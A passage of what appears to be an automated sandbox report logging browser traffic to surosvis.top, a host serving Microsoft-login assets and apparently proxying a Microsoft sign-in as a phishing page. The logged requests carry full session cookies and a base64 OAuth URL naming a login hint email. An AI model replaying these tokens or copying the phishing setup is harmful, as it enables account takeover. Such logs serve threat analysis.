esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA
Source: global traffic	HTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: login.live.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://surosvis.top/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA
Source: global traffic	HTTP traffic detected: GET /owa/prefetch.aspx HTTP/1.1Host: outlook.office365.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://surosvis.top/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_ppassword_f7b06b70c72b4590b779.js HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/appbackgrounds/49-small_e58aafc980614a9cd7796bea7b5ea8f0.jpg HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/appbackgrounds/49_7916a894ebde7d29c2cc29b267f1299f.jpg HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; 